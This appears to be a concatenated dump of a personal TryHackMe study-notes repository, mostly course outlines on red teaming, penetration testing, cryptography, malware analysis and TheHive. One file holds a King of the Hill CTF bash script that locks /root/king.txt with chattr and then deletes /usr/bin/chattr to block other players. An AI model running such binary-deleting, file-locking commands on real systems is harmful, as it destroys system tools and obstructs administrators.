16 | > - [x] Task 1 Introduction
`VIP` [Firewalls](https://tryhackme.com/jr/redteamfirewalls)
28 | > ## Learn about and experiment with various firewall evasion techniques, such as port hopping and port tunneling.
29 | > - [ ] Task 1 Introduction
`VIP` [Sandbox Evasion](https://tryhackme.com/jr/sandboxevasion)
41 | > ## Learn about active defense mechanisms Blue Teamers can deploy to identify adversaries in their environment.
42 | > - [ ] Task 1 Introduction
Red Team Fundamentals
2 | > #### Learn the core components of a red team engagement, from threat intelligence to OPSEC and C2s This module will introduce the core components and structure of a red team engagement.
3 |
4 | > #### You will learn how to apply threat intelligence to red team engagements, utilize operations security processes, and will set up your own command and control server.
5 |
6 | > #### By the end of the module, you will be able to plan a red team engagement and understand the methodologies used to emulate a real threat actor.
7 |
8 | ---
9 | 
10 |
11 | ## ✅ `Free` [Red Team Fundamentals](https://tryhackme.com/jr/redteamfundamentals)
12 |
13 |
14 | > Learn about the basics of a red engagement, the main components and stakeholders involved, and how red teaming differs from other cyber security engagements.
15 | - [x] Task 1 Introduction
16 | - [x] Task 2 Vulnerability Assessment and Penetration Tests Limitations
17 | - [x] Task 3 Red Team Engagements
18 | - [x] Task 4 Teams and Functions of an Engagement
19 | - [x] Task 5 Engagement Structure
20 | - [x] Task 6 Overview of a Red Team Engagement
21 | - [x] Task 7 Conclusion
22 |
23 | ---
24 |
25 | ## ✅ `Free` [Red Team Engagements](https://tryhackme.com/jr/redteamengagements)
26 | > Learn the steps and procedures of a red team engagement, including planning, frameworks, and documentation.
27 | - [x] Task 1 Introduction
28 | - [x] Task 2 Defining Scope and Objectives
29 | - [x] Task 3 Rules of Engagement
30 | - [x] Task 4 Campaign Planning
31 | - [x] Task 5 Engagement Documentation
32 | - [x] Task 6 Concept of Operations
33 | - [x] Task 7 Resource Plan
34 | - [x] Task 8 Operations Plan
35 | - [x] Task 9 Mission Plan
36 | - [x] Task 10 Conclusion
37 |
38 | ---
39 |
40 |
41 | ## ✅ `VIP` [Red Team Threat Intel](https://tryhackme.com/jr/redteamthreatintel)
42 | > Apply threat intelligence to red team engagements and adversary emulation.
43 | - `TI` - Threat Intelligence
44 | - `TTP` - Tactics, Techniques, and Procedures
45 | - `CTI` - Cyber Threat Intelligence
46 | - `ISAC` - Information and Sharing Analysis Centers
47 | - [x] Task 1 Introduction
48 | - [x] Task 2 What is Threat Intelligence
49 | - [x] Task 3 Applying Threat Intel to the Red Team
50 | - [x] Task 4 The TIBER-EU Framework
51 | - [x] Task 5 TTP Mapping
52 | - [x] Task 6 Other Red Team Applications of CTI
53 | - [x] Task 7 Creating a Threat Intel Driven Campaign
54 | - [x] Task 8 Conclusion
55 |
56 | ---
57 |
58 | ## ✅ `VIP` [Red Team OPSEC](https://tryhackme.com/jr/opsec)
59 | > Learn how to apply Operations Security (OPSEC) process for Red Teams.
60 | - [x] [Task 1 Introduction]()
61 | - [x] [Task 2 Critical Information Identification]()
62 | - [x] [Task 3 Threat Analysis]()
63 | - [x] [Task 4 Vulnerability Analysis]()
64 | - [x] [Task 5 Risk Assessment]()
65 | - [x] [Task 6 Countermeasures]()
66 | - [x] [Task 7 More Practical Examples]()
67 | - [x] [Task 8 Summary]()
68 |
69 |
70 | ---
71 |
72 | ## ✅ `VIP` [Intro to C2](https://tryhackme.com/jr/introtoc2)
73 | > Learn the essentials of Command and Control to help you become a better Red Teamer and simplify your next Red Team assessment!
74 | - [x] [Task 1 Introduction]()
75 | - [x] [Task 2 Command and Control Framework Structure]()
76 | - [x] [Task 3 Common C2 Frameworks]()
77 | - [x] [Task 4 Setting Up a C2 Framework]()
78 | - [x] [Task 5 C2 Operation Basics]()
79 | - [x] [Task 6 Command, Control, and Conquer]()
80 | - [x] [Task 7 Advanced C2 Setups]()
81 | - [x] [Task 8 Wrapping Up]()
82 |
83 | ---
84 |
--------------------------------------------------------------------------------
/King of the Hill/KoTH/KoTH-Protection:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | #!/bin/bash
3 | #!/usr/bin/bash
4 | #!/usr/bin/env bash
5 | #!/data/data/com.termux/files/usr/bin/bash
6 | ###############################################
7 | # Name : Anlominus ~ KoTH
8 | # Last UPDATE : 2022 Jun 10
9 | # Create Date : 2022 Jun 10
10 | # Description: A script to protect your King Rank in KoTH
11 | # Skils: Best Copywriter IN the COSMOS!
12 | # BIG THANX TO ALL COMUNITY THAT SHARE ALL THAT FREE GREAT SCRIPTS
13 | # CREDIT: To All World Creators free Scripts & Tools
14 | # Location: Made With LOVE IN ISRAEL !
15 | # Source: [ https://github.com/Anlominus/TryHackMe/blob/main/King%20of%20the%20Hill/KoTH/KoTH-Protection ]
16 | # Aouther: MatheuzSecurity +~> Anlominus ~> RhytMix ~> KoTH-Protection
17 | # https://youtube.com/c/MatheuZSecurity
18 | # TryHackMe ~> King of The Hill: https://tryhackme.com/games/koth
19 | ###############################################
20 | clear
21 |
22 | DiabloColors(){
23 | ##############################################################################
24 | # COLORS AND BACKGROUNDS
25 | ##############################################################################
26 | Color_Off='\033[0m' # Text Reset
27 |
28 | # Regular Colors
29 | Black='\033[0;30m' # Black
30 | Red='\033[0;31m' # Red
31 | Green='\033[0;32m' # Green
32 | Yellow='\033[0;33m' # Yellow
33 | Blue='\033[0;34m' # Blue
34 | Purple='\033[0;35m' # Purple
35 | Cyan='\033[0;36m' # Cyan
36 | White='\033[0;97m' # White
37 |
38 | # Additional colors
39 | LGrey='\033[0;37m' # Ligth Gray
40 | DGrey='\033[0;90m' # Dark Gray
41 | LRed='\033[0;91m' # Ligth Red
42 | LGreen='\033[0;92m' # Ligth Green
43 | LYellow='\033[0;93m' # Ligth Yellow
44 | LBlue='\033[0;94m' # Ligth Blue
45 | LPurple='\033[0;95m' # Light Purple
46 | LCyan='\033[0;96m' # Ligth Cyan
47 |
48 |
49 | # Bold
50 | BBlack='\033[1;30m' # Black
51 | BRed='\033[1;31m' # Red
52 | BGreen='\033[1;32m' # Green
53 | BYellow='\033[1;33m' # Yellow
54 | BBlue='\033[1;34m' # Blue
55 | BPurple='\033[1;35m' # Purple
56 | BCyan='\033[1;36m' # Cyan
57 | BWhite='\033[1;37m' # White
58 |
59 | # Underline
60 | UBlack='\033[4;30m' # Black
61 | URed='\033[4;31m' # Red
62 | UGreen='\033[4;32m' # Green
63 | UYellow='\033[4;33m' # Yellow
64 | UBlue='\033[4;34m' # Blue
65 | UPurple='\033[4;35m' # Purple
66 | UCyan='\033[4;36m' # Cyan
67 | UWhite='\033[4;37m' # White
68 |
69 | # Background
70 | On_Black='\033[40m' # Black
71 | On_Red='\033[41m' # Red
72 | On_Green='\033[42m' # Green
73 | On_Yellow='\033[43m' # Yellow
74 | On_Blue='\033[44m' # Blue
75 | On_Purple='\033[45m' # Purple
76 | On_Cyan='\033[46m' # Cyan
77 | On_White='\033[47m' # White
78 | }
79 | DiabloColors
80 |
81 | if [[ $(id -u) -ne "0" ]]; then
82 | echo "[ERROR] You must run this script as root" >&2
83 | exit 1
84 | fi
85 |
86 | read -p "Put your nickname: " nick
87 |
88 | function protectKing() {
89 | echo $nick > /root/king.txt
90 | chmod 400 /root/king.txt
91 | chattr +i /root/king.txt
92 | set -o noclobber /root/king.txt
93 | }
94 |
95 | arr=('.' '..' '...' '....')
96 |
97 | for c in $(seq 1); do
98 | for elt in ${arr[*]}; do
99 | echo -ne "\r\033[<1>AProtecting your king $elt" && sleep 0.1;
100 | done
101 | done
102 |
103 | echo -ne "\n"
104 |
105 | message="Success! Your king has been protected! =D"
106 |
107 | for i in $(seq 1 ${#message}); do
108 | echo -ne "${message:i-1:1}"
109 | sleep 0.03
110 | done
111 |
112 | echo -ne "\n"
113 |
114 | clear
115 |
116 | function removeChattr(){
117 | rm /usr/bin/chattr
118 | }
119 |
120 | msg="[*] Success! Binary chattr removed! [*]"
121 |
122 | for i in $(seq 1 ${#msg}); do
123 | echo -ne "${msg:i-1:1}"
124 | sleep 0.03
125 | done
126 | echo -ne "\n"
127 |
128 | protectKing && removeChattr /
129 |
130 | echo -ne "\n"
131 |
--------------------------------------------------------------------------------
/Learning Path/CompTIA Pentest+/README.md:
--------------------------------------------------------------------------------
1 | # 🔰 [CompTIA Pentest+](https://tryhackme.com/path-action/pentestplus/join)
2 |
3 | 
4 |
5 |
6 | # [CompTIA Pentest+](https://tryhackme.com/paths)
7 | > ## This PenTest+ pathway allows individuals to practice the majority of practical skills required for the CompTIA PenTest+ exam.
8 | > ## In this you will learn about
9 | > - Industry standard penetration testing tools
10 | > - Identifying and exploiting different network services
11 | > - Exploiting web applications through today’s most common vulnerabilities
12 | > - Understanding Windows active directory and attacking Kerberos
13 | > - Post exploitation techniques (with Powerview, Bloodhound and Mimikatz)
14 | > - CompTIA PenTest+ is for cybersecurity professionals tasked with penetration testing and vulnerability management.
15 |
16 | ### Complete this pathway and receive 10% off the Pentest+ exam!
17 |
18 | * Hands-on exercises aligning to PenTest+ exam objectives
19 | * Practical exam preparation to help you with the Performance Based Questions
20 |
21 |
22 | - 51 Hours
23 |
24 | - Easy
25 |
26 | ---
27 |
28 | - [x] ✅ [Penetration Testing Tools]()
29 | - [x] ✅ [Application-based vulnerabilities]()
30 | - [x] ✅ [Network-based vulnerabilities]()
31 | - [ ] [Local-host vulnerabilities]()
32 |
33 | ---
34 |
35 | - # ✅ [Penetration Testing Tools]()
36 | > ## The following rooms will teach you how to use tools that are commonly used in the industry to perform penetration tests.
37 | > ## If you're going to be a pentester, you'll need to have these tools equipped in your toolkit.
38 | > - [x] [Tutorial](https://tryhackme.com/jr/tutorial)
39 | > - [x] [Nmap](https://tryhackme.com/jr/furthernmap)
40 | > - [x] [Burp Suite: The Basics](https://tryhackme.com/jr/burpsuitebasics)
41 | > - [x] [Metasploit: Introduction](https://tryhackme.com/jr/metasploitintro)
42 | > - [x] [Nessus](https://tryhackme.com/jr/rpnessusredux)
43 | > - [x] [Hydra](https://tryhackme.com/jr/hydra)
44 |
45 |
46 | - # ✅ [Application-based vulnerabilities]()
47 | > ## Use the following rooms to understand the core security issues with web applications.
48 | > ## The rooms in this section will give you the experience needed to identify and exploit some of the most common vulnerabilities found in the wild today.
49 | > - [X] [HTTP in detail](https://tryhackme.com/jr/httpindetail)
50 | > - [X] [OWASP Top 10](https://tryhackme.com/jr/owasptop10)
51 | > - [X] [OWASP Juice Shop](https://tryhackme.com/jr/owaspjuiceshop)
52 | > - [X] [Vulnversity](https://tryhackme.com/jr/vulnversity)
53 |
54 |
55 | - # ✅ [Network-based vulnerabilities]()
56 | > ## This section will start you off by exploring networking basics.
57 | > ## You will then move on to enumerating and exploiting a variety of different network services.
58 | > ## When you've grasped the basics, you'll put your knowledge by exploiting a Linux Samba share.
59 | > - [X] [Introductory Networking](https://tryhackme.com/jr/introtonetworking)
60 | > - [X] [Network Services](https://tryhackme.com/jr/networkservices)
61 | > - [X] [Network Services 2](https://tryhackme.com/jr/networkservices2)
62 | > - [X] [Kenobi](https://tryhackme.com/jr/kenobi)
63 |
64 |
65 | - # [Local-host vulnerabilities]()
66 | > ## Windows Active Directory (AD) environments dominate the corporate and governmental world's organizational networking structure.
67 | > ## This section will teach you the AD basics, how to attack Kerberos and a domain controller, followed by some post-exploitation techniques.
68 | > - [X] [Active Directory Basics](https://tryhackme.com/jr/activedirectorybasics)
69 | > - [x] [Attacktive Directory](https://tryhackme.com/jr/attacktivedirectory)
70 | > - [x] [Attacking Kerberos](https://tryhackme.com/jr/attackingkerberos)
71 | > - [x] [Post-Exploitation Basics](https://tryhackme.com/jr/postexploit)
72 |
73 |
74 |
75 |
76 | ---
77 |
--------------------------------------------------------------------------------
/Learning Path/Red Teaming/README.md:
--------------------------------------------------------------------------------
1 | # [Red Teaming](https://tryhackme.com/path-action/redteaming/join) | [Path Outline](https://tryhackme.com/path/outline/redteaming)
2 |
3 | The aim of this pathway is to show you how to emulate a potential adversary attack in complex environments.
4 | Going beyond penetration testing, you will learn to conduct successful Red Team engagements and challenge the defence capability of your clients.
5 |
6 | After completing this pathway, you will have the advanced skills needed to pursue new career opportunities in offensive security.
7 |
8 | ---
9 |
10 |
11 |
12 | ## [Red Team Fundamentals]()
13 | 
14 |
15 | ##### Learn the core components of a red team engagement, from threat intelligence to OPSEC and C2s.
16 |
17 |
18 |
19 | - #### ✅ [Red Team Fundamentals]()
20 | ##### Learn about the basics of a red engagement, the main components and stakeholders involved, and how red teaming differs from other cyber security engagements.
21 |
22 |
23 | - #### ✅ [Red Team Engagements]()
24 | ##### Learn the steps and procedures of a red team engagement, including planning, frameworks, and documentation.
25 |
26 |
27 | - #### ✅ [Red Team Threat Intel]()
28 | ##### Apply threat intelligence to red team engagements and adversary emulation.
29 |
30 |
31 | - #### ✅ [Red Team OPSEC]()
32 | ##### Learn how to apply Operations Security (OPSEC) process for Red Teams.
33 |
34 |
35 | - #### ✅ [Intro to C2]()
36 | ##### Learn the essentials of Command and Control to help you become a better Red Teamer and simplify your next Red Team assessment!
37 |
38 |
39 | ---
40 |
41 | ## [Initial Access]()
42 | 
43 |
44 | ##### Explore the different techniques to gain initial access to a target system and network from a Red Teamer’s perspective.
45 |
46 | - #### ✅ [Initial Access]()
47 | Explore the different techniques to gain initial access to a target system and network from a Red Teamer’s perspective.
48 |
49 | - #### ✅ [Red Team Recon]()
50 | Learn how to use DNS, advanced searching, Recon-ng, and Maltego to collect information about your target.
51 |
52 | - #### [Weaponization]()
53 | Understand and explore common red teaming weaponization techniques. You will learn to build custom payloads using common methods seen in the industry to get initial access.
54 |
55 | - #### [Password Attacks]()
56 | This room introduces the fundamental techniques to perform a successful password attack against various services and scenarios.
57 |
58 | - #### [Phishing]()
59 | Learn what phishing is and why it's important to a red team engagement. You will set up phishing infrastructure, write a convincing phishing email and try to trick your target into opening your email in a real-world simulation.
60 |
61 | ---
62 |
63 | ## [Post Compromise]()
64 | 
65 |
66 | ##### Learn about the steps taken by an attacker right after gaining an initial foothold on a network.
67 |
68 | ---
69 |
70 | ## [Host Evasions]()
71 | 
72 |
73 | ##### Understand the techniques behind host-based security and bypass the most common security products in Windows operating systems.
74 |
75 | ---
76 |
77 | ## [Network Security Evasion]()
78 | 
79 |
80 | ##### Learn how to bypass and evade different security solutions used in the industry, such as firewalls and IDS/IPS.
81 |
82 | ---
83 |
84 | ## [Compromising Active Directory]()
85 | 
86 |
87 | ##### Learn and exploit Active Directory networks through core security issues stemming from misconfigurations.
88 |
89 | ---
90 |
--------------------------------------------------------------------------------
/Learning Path/Complete Beginner/Cryptography/Encryption - Crypto 101/README.md:
--------------------------------------------------------------------------------
1 | 
2 | - [x] [Encryption - Crypto 101](https://tryhackme.com/room/encryptioncrypto101)
3 | > An introduction to encryption, as part of a series on crypto
4 | - [x] Task 1 What will this room cover?
5 | - [x] Task 2 Key terms
6 | - [x] Task 3 Why is Encryption important?
7 | - [x] Task 4 Crucial Crypto Maths
8 | - [x] Task 5 Types of Encryption
9 | - `Symmetric encryption` uses the same key to encrypt and decrypt the data.
10 | - Examples of Symmetric encryption are DES (Broken) and AES.
11 | - These algorithms tend to be faster than asymmetric cryptography, and use smaller keys (128 or 256 bit keys are common for AES, DES keys are 56 bits long).
12 | - `Asymmetric encryption` uses a pair of keys, one to encrypt and the other in the pair to decrypt.
13 | - Examples are RSA and Elliptic Curve Cryptography.
14 | - Normally these keys are referred to as a public key and a private key.
15 | - Data encrypted with the private key can be decrypted with the public key, and vice versa.
16 | - Your private key needs to be kept private, hence the name.
17 | - Asymmetric encryption tends to be slower and uses larger keys, for example RSA typically uses 2048 to 4096 bit keys.
18 | - `RSA` and Elliptic Curve cryptography are based around different mathematically difficult (intractable) problems, which give them their strength.
19 | - More about RSA later.
20 | - [x] Task 6 `RSA` - Rivest Shamir Adleman
21 | - There are some excellent tools for defeating RSA challenges in CTFs
22 | - [RsaCtfTool](https://github.com/Ganapati/RsaCtfTool)
23 | - [RsatTool](https://github.com/ius/rsatool)
24 | - [RSA ENCRYPTION](https://muirlandoracle.co.uk/2020/01/29/rsa-encryption/)
25 | - The key variables that you need to know about for RSA in CTFs are p, q, m, n, e, d, and c.
26 | - “p” and “q” are large prime numbers, “n” is the product of p and q.
27 | - The public key is n and e, the private key is n and d.
28 | - “m” is used to represent the message (in plaintext) and “c” represents the ciphertext (encrypted text).
29 | - [x] Task 7 Establishing Keys Using Asymmetric Cryptography
30 | - [x] Task 8 Digital signatures and Certificates
31 | - [x] Task 9 SSH Authentication
32 | - [x] Task 10 Explaining Diffie Hellman Key Exchange
33 | - [x] Task 11 PGP, GPG and AES
34 | - [x] Task 12 The Future - Quantum Computers and Encryption
35 |
36 | ---
37 |
38 | # Key Terms
39 | - `Ciphertext` - The result of encrypting a plaintext, encrypted data
40 | - `Cipher` - A method of encrypting or decrypting data. Modern ciphers are cryptographic, but there are many non cryptographic ciphers like Caesar.
41 | - `Plaintext` - Data before encryption, often text but not always. Could be a photograph or other file
42 | - `Encryption` - Transforming data into ciphertext, using a cipher.
43 | - `Encoding` - NOT a form of encryption, just a form of data representation like base64. Immediately reversible.
44 | - `Key` - Some information that is needed to correctly decrypt the ciphertext and obtain the plaintext.
45 | - `Passphrase` - Separate to the key, a passphrase is similar to a password and used to protect a key.
46 | - `Asymmetric encryption` - Uses different keys to encrypt and decrypt.
47 | - `Symmetric encryption` - Uses the same key to encrypt and decrypt
48 | - `Brute force` - Attacking cryptography by trying every different password or every different key
49 | - `Cryptanalysis` - Attacking cryptography by finding a weakness in the underlying maths
50 | - `RSA` - Rivest Shamir Adleman
51 | - `PGP` - Pretty Good Privacy
52 | - `GPG` - GNU Privacy Guard
53 | - `AES` - Advanced Encryption Standard
54 |
55 | # Private-key cryptosystems
56 | > Private-key cryptosystems use the same key for encryption and decryption.
57 | - Caesar cipher
58 | - Substitution cipher
59 | - Enigma machine
60 | - Data Encryption Standard
61 | - Twofish
62 | - Serpent
63 | - Camellia
64 | - Salsa20
65 | - ChaCha20
66 | - Blowfish
67 | - CAST5
68 | - Kuznyechik
69 | - RC4
70 | - 3DES
71 | - Skipjack
72 | - Safer
73 | - IDEA
74 | > Advanced Encryption Standard, also known as AES and Rijndael.
75 |
76 | # Public-key cryptosystems
77 | > Public-key cryptosystems use a public key for encryption and a private key for decryption.
78 | - Diffie–Hellman key exchange
79 | - RSA encryption
80 | - Rabin cryptosystem
81 | - Schnorr signature
82 | - ElGamal encryption
83 | - Elliptic-curve cryptography
84 | - Lattice-based cryptography
85 | - McEliece cryptosystem
86 | - Multivariate cryptography
87 | - Isogeny-based cryptography
88 |
89 | ---
90 |
91 | # Sources
92 |
93 |
94 |
--------------------------------------------------------------------------------
/Badges/README.md:
--------------------------------------------------------------------------------
1 |
[MAL: Malware Introductory](https://tryhackme.com/room/malmalintroductory)
4 | > ## The start of a series of rooms covering Malware Analysis...
5 | > - [ ] Task 1 [What is the Purpose of Malware Analysis?]()
6 | > - [ ] Task 2 [Understanding Malware Campaigns]()
7 | > - [ ] Task 3 [Identifying if a Malware Attack has Happened]()
8 | > - [ ] Task 4 [Static Vs. Dynamic Analysis]()
9 | > - [ ] Task 5 [Discussion of Provided Tools & Their Uses]()
10 | > - [ ] Task 6 [Connecting to the Windows Analysis Environment (Deploy)]()
11 | > - [ ] Task 7 [Obtaining MD5 Checksums of Provided Files]()
12 | > - [ ] Task 8 [Now lets see if the MD5 Checksums have been analysed before]()
13 | > - [ ] Task 9 [Identifying if the Executables are obfuscated / packed]()
14 | > - [ ] Task 10 [What is Obfuscation / Packing?]()
15 | > - [ ] Task 11 [Visualising the Differences Between Packed & Non-Packed Code]()
16 | > - [ ] Task 12 [Introduction to Strings]()
17 | > - [ ] Task 13 [Introduction to Imports]()
18 | > - [ ] Task 14 [Practical Summary]()
19 |
20 | ---
21 |
22 | ## Task 1 [What is the Purpose of Malware Analysis?]()
23 | #### Malware is such a prevalent topic within Cybersecurity, and often an unfortunately recurring theme among global news today.
24 |
25 | Not only is malware analysis a form of incidence response, but it is also useful in understanding how the behaviours of variants of malware result in their respective categorisation.
26 |
27 | This room will be a practical introduction to the techniques and tools used throughout malware analysis - albeit brief, I hope to expand on these techniques a lot more in-depth within the future.
28 |
29 | #### When analysing malware, it is important to consider the following:
30 |
31 | - Point of Entry (PoE) I.e.
32 | - [ ] Was it through spam that our e-mail filtering missed and the user opened the attachment?
33 | - Let's review our spam filters and train our users better for future prevention!
34 |
35 | - [ ] What are the indicators that malware has even been executed on a machine?
36 | - [ ] Are there any files, processes, or perhaps any attempt of "un-ordinary" communication?
37 |
38 | - [ ] How does the malware perform?
39 | - [ ] Does it attempt to infect other devices?
40 | - [ ] Does it encrypt files or install anything like a backdoor / Remote Access Tool (RAT)?
41 |
42 | - [ ] Most importantly - can we ultimately prevent and/or detect further infection?!
43 |
44 | ---
45 |
46 | ## Task 2 [Understanding Malware Campaigns]()
47 |
48 | Despite the many variants of malware, attacks can generally be classified into two types: Targeted and Mass Campaign.
49 |
50 | ### Targeted
51 |
52 | A "Targeted" attack is just that - targeted.
53 | In most cases, malware attacks that occur this way are created for a specific purpose against a specific target.
54 | A great example of this type of purpose could be the DarkHotel malware, whom is designed to steal information such as authentication details from government officials.
55 |
56 | ### Mass Campaign
57 |
58 | On the other hand, the "Mass Campaign" classification can be akin to many real life examples, and is the most common type of attacks.
59 | The entire purpose of this type of Malware is to infect as many devices as possible and perform whatever it may - regardless of target.
60 |
61 | Companies such as Kaspersky to name one, track these campaigns (known as Advanced Persistent Threats (APTs) and often report on their infection rate and indicators, much akin to the real-life spread of a virus from the World Health Organisation (WHO).
62 |
63 | Kaspersky report on the "Crouching Yeti (Energetic Bear)" campaign, this campaign specifically targets the following:
64 |
65 | - Industrial/machinery
66 | - Manufacturing
67 | - Pharmaceutical
68 | - Construction
69 | - Education
70 | - Information technology
71 |
72 | (Kaspersky)
73 |
74 | Whilst it this variant is technically targeted, there is a rather large scope of this variant of malware, and as such, can be considered as a "Mass Campaign" attack.
75 |
76 | ---
77 |
78 | ## Task 3 [Identifying if a Malware Attack has Happened]()
79 |
80 | ---
81 |
82 | ## Task 4 [Static Vs. Dynamic Analysis]()
83 |
84 | ---
85 |
86 | ## Task 5 [Discussion of Provided Tools & Their Uses]()
87 |
88 | ---
89 |
90 | ## Task 6 [Connecting to the Windows Analysis Environment (Deploy)]()
91 |
92 | ---
93 |
94 | ## Task 7 [Obtaining MD5 Checksums of Provided Files]()
95 |
96 | ---
97 |
98 | ## Task 8 [Now lets see if the MD5 Checksums have been analysed before]()
99 |
100 | ---
101 |
102 | ## Task 9 [Identifying if the Executables are obfuscated / packed]()
103 |
104 | ---
105 |
106 | ## Task 10 [What is Obfuscation / Packing?]()
107 |
108 | ---
109 |
110 | ## Task 11 [Visualising the Differences Between Packed & Non-Packed Code]()
111 |
112 | ---
113 |
114 | ## Task 12 [Introduction to Strings]()
115 |
116 | ---
117 |
118 | ## Task 13 [Introduction to Imports]()
119 |
120 | ---
121 |
122 | ## Task 14 [Practical Summary]()
123 |
--------------------------------------------------------------------------------
/Room/TheHive Project/README.md:
--------------------------------------------------------------------------------
1 | 
2 |
3 | # [TheHive Project](https://tryhackme.com/room/thehiveproject)
4 | #### Learn how to use TheHive, a Security Incident Response Platform, to report investigation findings
5 |
6 | - Task 1 | Room Outline
7 | - Task 2 | Introduction
8 | - Task 3 | TheHive Features & Integrations
9 | - Task 4 | User Profiles & Permissions
10 | - Task 5 | Analyst Interface Navigation
11 | - Task 6 | Room Conclusion
12 |
13 | ---
14 |
15 | - ## Task 1 | Room Outline
16 |
17 | Welcome to TheHive Project Outline!
18 |
19 | This room will cover the foundations of using the TheHive Project, a Security Incident Response Platform.
20 | Specifically, we will be looking at:
21 |
22 | - What TheHive is?
23 | - An overview of the platform's functionalities and integrations.
24 | - Installing TheHive for yourself.
25 | - Navigating the UI.
26 | - Creation of a case assessment.
27 |
28 | Before we begin, ensure you download the attached file, as it will be needed for Task 5.
29 |
30 | 
31 |
32 |
33 |
34 | ---
35 |
36 | - ## Task 2 | Introduction
37 |
38 | TheHive Project is a scalable, open-source and freely available Security Incident Response Platform, designed to assist security analysts and practitioners working in SOCs, CSIRTs and CERTs to track, investigate and act upon identified security incidents in a swift and collaborative manner.
39 |
40 | Security Analysts can collaborate on investigations simultaneously, ensuring real-time information pertaining to new or existing cases, tasks, observables and IOCs are available to all team members.
41 |
42 | More information about the project can be found on https://thehive-project.org/ & their [GitHub Repo](https://github.com/TheHive-Project/TheHive).
43 |
44 | 
45 | Image: Cases dashboard on TheHive by order of reported severity
46 |
47 |
48 | TheHive Project operates under the guide of three core functions:
49 |
50 | - **Collaborate**: Multiple analysts from one organisation can work together on the same case simultaneously. Through its live stream capabilities, everyone can keep an eye on the cases in real time.
51 | - **Elaborate**: Investigations correspond to cases. The details of each case can be broken down into associated tasks, which can be created from scratch or through a template engine. Additionally, analysts can record their progress, attach artifacts of evidence and assign tasks effortlessly.
52 | - **Act**: A quick triaging process can be supported by allowing analysts to add observables to their cases, leveraging tags, flagging IOCs and identifying previously seen observables to feed their threat intelligence.
53 |
54 |
55 | ---
56 |
57 | - ## Task 3 | TheHive Features & Integrations
58 |
59 | TheHive allows analysts from one organisation to work together on the same case simultaneously. This is due to the platform's rich feature set and integrations that support analyst workflows. The features include:
60 |
61 | - **Case/Task Management**: Every investigation is meant to correspond to a case that has been created. Each case can be broken down into one or more tasks for added granularity and even be turned into templates for easier management. Additionally, analysts can record their progress, attach pieces of evidence or noteworthy files, add tags and other archives to cases.
62 |
63 | - **Alert Triage**: Cases can be imported from SIEM alerts, email reports and other security event sources. This feature allows an analyst to go through the imported alerts and decide whether or not they are to be escalated into investigations or incident response.
64 |
65 | - **Observable Enrichment with Cortex**: One of the main feature integrations TheHive supports is Cortex, an observable analysis and active response engine. Cortex allows analysts to collect more information from threat indicators by performing correlation analysis and developing patterns from the cases. More information on [Cortex](https://github.com/TheHive-Project/Cortex/).
66 |
67 | - **Active Response**: TheHive allows analysts to use Responders and run active actions to communicate, share information about incidents and prevent or contain a threat.
68 |
69 | - **Custom Dashboards**: Statistics on cases, tasks, observables, metrics and more can be compiled and distributed on dashboards that can be used to generate useful KPIs within an organisation.
70 |
71 | - **Built-in MISP Integration**: Another useful integration is with [MISP](https://www.misp-project.org/index.html), a threat intelligence platform for sharing, storing and correlating Indicators of Compromise of targeted attacks and other threats. This integration allows analysts to create cases from MISP events, import IOCs or export their own identified indicators to their MISP communities.
72 |
73 | Other notable integrations that TheHive supports are [DigitalShadows2TH](https://github.com/TheHive-Project/DigitalShadows2TH) & [ZeroFox2TH](https://github.com/TheHive-Project/Zerofox2TH), free and open-source extensions of alert feeders from [DigitalShadows](https://www.digitalshadows.com/) and [ZeroFox](https://www.zerofox.com/) respectively. These integrations ensure that alerts can be added into TheHive and transformed into new cases using pre-defined incident response templates or by adding to existing cases.
74 |
75 |
76 | ---
77 |
78 | - ## Task 4 | User Profiles & Permissions
79 |
80 | ---
81 |
82 | - ## Task 5 | Analyst Interface Navigation
83 |
84 | ---
85 |
86 | - ## Task 6 | Room Conclusion
87 |
88 | ---
89 |
--------------------------------------------------------------------------------
/Learning Path/Web Fundamentals/Introduction to Web Hacking/README.md:
--------------------------------------------------------------------------------
1 |
2 | ## Introduction to Web Hacking
3 |
4 | 
5 |
6 | ### Get hands-on, learn about and exploit some of the most popular web application vulnerabilities seen in the industry today.
7 |
8 | 
9 | - [x] [Walking An Application](https://tryhackme.com/jr/walkinganapplication)
10 | - Manually review a web application for security issues using only your browsers developer tools. Hacking with just your browser, no tools or scripts.
11 | - [x] Task 1 Walking An Application
12 | - [x] Task 2 Exploring The Website
13 | - [x] Task 3 Viewing The Page Source
14 | - [x] Task 4 Developer Tools - Inspector
15 | - [x] Task 5 Developer Tools - Debugger
16 | - [x] Task 6 Developer Tools - Network
17 |
18 | - [x] [Content Discovery](https://tryhackme.com/room/contentdiscovery)
19 | - Learn the various ways of discovering hidden or private content on a webserver that could lead to new vulnerabilities.
20 | - [x] Task 1 What Is Content Discovery?
21 | - [x] Task 2 Manual Discovery - Robots.txt
22 | - [x] Task 3 Manual Discovery - Favicon
23 | - [x] Task 4 Manual Discovery - Sitemap.xml
24 | - [x] Task 5 Manual Discovery - HTTP Headers
25 | - [x] Task 6 Manual Discovery - Framework Stack
26 | - [x] Task 7 OSINT - Google Hacking / Dorking
27 | - [x] Task 8 OSINT - Wappalyzer
28 | - [x] Task 9 OSINT - Wayback Machine
29 | - [x] Task 10 OSINT - GitHub
30 | - [x] Task 11 OSINT - S3 Buckets
31 | - [x] Task 12 Automated Discovery
32 |
33 | - [x] [Subdomain Enumeration](https://tryhackme.com/room/subdomainenumeration)
34 | - Learn the various ways of discovering subdomains to expand your attack surface of a target.
35 | - [x] Task 1 Brief
36 | - [x] Task 2 OSINT - SSL/TLS Certificates
37 | - [x] Task 3 OSINT - Search Engines
38 | - [x] Task 4 DNS Bruteforce
39 | - [x] Task 5 OSINT - Sublist3r
40 | - [x] Task 6 Virtual Hosts
41 |
42 | - [x] [Authentication Bypass](https://tryhackme.com/room/authenticationbypass)
43 | - Learn how to defeat logins and other authentication mechanisms to allow you access to unpermitted areas.
44 | - [x] Task 1 Brief
45 | - [x] Task 2 Username Enumeration
46 | - [x] Task 3 Brute Force
47 | - [x] Task 4 Logic Flaw
48 | - [x] Task 5 Cookie Tampering
49 |
50 | - [x] [IDOR](https://tryhackme.com/room/idor)
51 | - Learn how to find and exploit IDOR vulnerabilities in a web application giving you access to data that you shouldn't have.
52 | - [x] Task 1 What is an IDOR?
53 | - [x] Task 2 An IDOR Example
54 | - [x] Task 3 Finding IDORs in Encoded IDs
55 | - [x] Task 4 Finding IDORs in Hashed IDs
56 | - [x] Task 5 Finding IDORs in Unpredictable IDs
57 | - [x] Task 6 Where are IDORs located
